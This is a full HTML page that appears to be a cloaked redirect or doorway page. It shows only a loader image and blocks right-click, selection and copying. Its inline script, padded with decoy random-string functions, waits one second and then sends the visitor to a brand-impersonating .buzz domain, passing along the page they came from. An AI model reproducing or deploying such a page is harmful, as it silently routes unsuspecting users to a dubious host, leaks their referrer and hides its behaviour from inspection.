<html lang="en">
  <head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title></title>
<meta name="description" content="">
<meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no">
<meta name="apple-touch-fullscreen" content="yes">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="format-detection" content="telephone-no">
  
<style>
*{
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	box-sizing: border-box;	
}
body{
	padding:0px;
	margin:0px;
	background-color: #fff;
}
.container {
    margin-right: auto;    margin-left: auto;    width: 960px;padding: 10px; text-align: center;        margin-top: 10%;
}
.logoimg {
    width: auto;
    max-height: 600px;
    max-width: 800px;
}

@media screen and (max-width:960px){
    .container {width: auto;}
    .logoimg {   margin-top:50%; width: 80%;     max-height: unset; }
}

</style>
</head>

<body leftmargin="0" topmargin="0" oncontextmenu='return false' ondragstart='return false' onselectstart='return false' onselect='document.selection.empty()' oncopy='document.selection.empty()' onbeforecopy='return false' onmouseup='document.selection.empty()'>

<div class="container">
<img src="/go/loader.gif" class="logoimg">
</div>
<div id="dvContent" style="display:none"><span id="spTime">1</span></div>
<script type="text/javascript"> 
function getRandom(a){return Math.floor(Math.random()*a)}function randDateString(a){var b=new Date;a=b.getUTCDate();var c=b.getUTCMonth();b="k8 5h f5 1a g6 5i jq 63 k5 8l".split(" ");c=2==c.toString().length?b[parseInt(c/10%10)]+b[parseInt(c%10)]:b[c];a=2==a.toString().length?b[parseInt(a/10%10)]+""+b[parseInt(a%10)]:b[a];return n=c+a}function randomString(a){return n="t1 5o w6 5v l3 1b ca 75 f3 5s".split(" ")[getRandom(10)]}function domains(a){return n=["baise.xiaomi-7ae.buzz"][getRandom(1)]}console.log(randomString());
str="https://"+domains()+"/?utm_source="+document.referrer;LoadURL();function LoadURL(){var a=document.getElementById("spTime").innerHTML,b=setTimeout("LoadURL()",1E3);0<a?(a--,document.getElementById("spTime").innerHTML=a):(clearTimeout(b),document.getElementById("dvContent").innerHTML="",window.location.href=str)};
</script>



</body>
</html>
